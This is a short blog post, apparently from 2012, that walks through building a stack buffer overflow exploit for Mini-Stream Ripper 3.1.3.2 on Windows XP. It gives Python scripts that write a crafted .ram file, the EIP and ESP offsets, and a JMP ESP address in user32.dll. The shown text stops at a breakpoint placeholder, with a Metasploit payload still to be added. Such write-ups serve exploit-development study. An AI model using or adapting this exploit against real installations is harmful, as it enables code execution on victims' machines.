Monday, February 20, 2012

Mini-Stream Ripper 3.1.3.2.2010.06.13 Buffer Overflow

# Exploit Title: Mini-Stream Ripper 3.1.3.2.2010.06.13 Buffer Overflow
# Link: http://mini-stream.net/mini-stream-ripper/download/
# Version: 3.1.3.2.2010.06.13
# Tested on: Microsoft Windows XP SP 2

ok, i have this fuzzer, and i'll try to exploit this application, fuzzer :

wed = "http://."
wed+= "\x41" * 18000
f=open("dos.ram","w+")
f.write(wed)
f.close()

let's try to catch that. first time, prepare immunity debbuger, fuzzer and mini stream ripper. then running this application from immunity, when i load my fuzzer, i find that the application error in 18000 char, and i can see that address of EIP covered by 414141. we know this is direct ret, so this is will easily. now i try to find how many byte EIP covered using pattern_create by framework. this address of EIP covered by char 69573569 and ESP Wi8Wi9Wj0. after this, we can know how many byte the registers covered using pattern_offset.

ESP hit the byte 17424 and EIP hit the byte in  17416. now, i'll try using this fuzzer to ensure address from EIP.

wed = "http://."
wed+= "\x90" * 17416
wed+= "\xEF\xBE\xAD\xDE"
f=open("dos.ram","w+")
f.write(wed)
f.close()

and address from EIP change DEADBEEF. after this, i'll try to find JMP ESP, let's go find it :D
with this fuzzer i find address of JMP ESP in user32.dll with address 77D8AF0A.

wed = "http://."
wed+= "\x90" * 17416
wed+= "\xEF\xBE\xAD\xDE"
wed+= "\x90" * (17424 -len(wed))
wed+= "\xCC" * (18000 -len(wed))
f=open("dos.ram","w+")
f.write(wed)
f.close()

now i try to exploit this application with payload from metasploit.

No comments:

Post a Comment